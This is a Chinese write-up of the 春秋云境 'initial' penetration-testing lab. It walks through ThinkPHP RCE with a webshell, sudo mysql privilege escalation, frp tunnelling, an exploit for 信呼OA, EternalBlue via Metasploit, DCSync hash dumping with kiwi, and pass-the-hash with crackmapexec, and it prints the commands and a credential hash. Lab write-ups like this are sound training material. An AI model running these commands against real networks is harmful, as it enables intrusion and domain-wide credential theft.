春秋云境-initial
漏洞点
- thinkphp 5.0.23 RCE
- mysql命令提权
- 信呼nday
- ms17-010(永恒之蓝)
- DCSync
拿到ip后使用fscan扫描fscan -h 39.99.237.93
发现存在thinkphp的rce
flag01
- 使用thinkphp利用工具
https://github.com/Lotus6/ThinkphpGUI
- 检测漏洞
- 利用漏洞上传一句话木马
- 使用蚁剑连接,密码为peiqi
执行id ,发现用户为www-data的低权限用户
使用sudo -l命令发现mysql无需密码就可提权 - 提权
使用命令找到flag01目录
sudo mysql -e '\! find / -name flag*'
查看flag01
sudo mysql -e '\! cat /root/flag/f*'
flag02
使用ifconfig查看ip ,看到39.99.237.93还有内网ip172.22.1.15
内网扫描
上传fscan到tmp目录下,所有用户tmp目录都可写。扫描存活主机
fscan -h 172.22.1.0/24
,执行命令后会生成result.txt
得到结果
172.22.1.2 DC
172.22.1.18 信呼OA
172.22.1.21 MS17-010frp内网穿透
由于本机无法直接访问目标内网服务,需要将拿下的第一台机器172.22.1.15的内网流量转发到攻击者的公网服务器上,本机再使用代理工具就可以访问内网服务了;172.22.1.15执行如下命令(公网服务器先执行监听,内网ip后执行)
./frpc -c frpc.toml
frpc.toml配置如下
1 | serverAddr = "公网ip" |
公网IP执行如下命令
./frps -c frps.toml
执行前需要chmod 777 frps 给予其执行权限
配置监听7777端口即可
当内网ip执行命令后回显如下
使用Proxifier代理工具
配置代理服务器
地址为攻击者公网ip、端口为监听端口
填好后先点击左下角的检查看看是否代理成功
配置代理规则
配置完成后本机即可访问其他内网资源访问172.22.1.18 信呼OA
存在admin/admin123弱口令,登陆后如下
搜索OA版本号即可找到漏洞exp
1 | import requests |
- 使用172.22.1.15机器执行exp
执行前需在和脚本同一目录下放一个1.php的一句话木马
执行成功后就可以连接一句话木马,链接如图
- 连接一句话木马后,查找flag
执行命令dir C:\flag* /s /p
查找C盘下的文件,找到flag02文件
提示下一个flag在域控中
flag03
前面fscan扫描得到172.22.1.21 存在MS17-010永恒之蓝,由于没有直接登录域控的方法,可以通过ms17-010拿到21机器的shell,然后利用Dcsync滥用获取管理员hash,横向移动登录域控查看flag03
- 配置kali代理
vim /etc/proxychains4.conf
- 代理启动msf
proxychains4 msfconsole
- 漏洞利用->获得21机器system权限的shell
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run
- Dcsync滥用获取hash
DCSync攻击:
DCSync的原理是利用域控制器之间的数据同步复制
DCSync是AD域渗透中常用的凭据窃取手段,默认情况下,域内不同DC每隔15分钟会进行一次数据同步,当一个DC从另外一个DC同步数据时,发起请求的一方会通过目录复制协议(MS- DRSR)来对另外一台域控中的域用户密码进行复制,DCSync就是利用这个原理,“模拟”DC向真实DC发送数据同步请求,获取用户凭据数据,由于这种攻击利用了Windows RPC协议,并不需要登陆域控或者在域控上落地文件,避免触发EDR告警,因此DCSync时一种非常隐蔽的凭据窃取方式
用kali加载kiwi模块以便于Dcsync利用
load kiwi
kiwi_cmd “lsadump::dcsync /domain:xiaorang.lab /all /csv” exit`
得到所有用户hash - 横向移动查看flag03
使用crackmapexec横向移动
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
得到flag03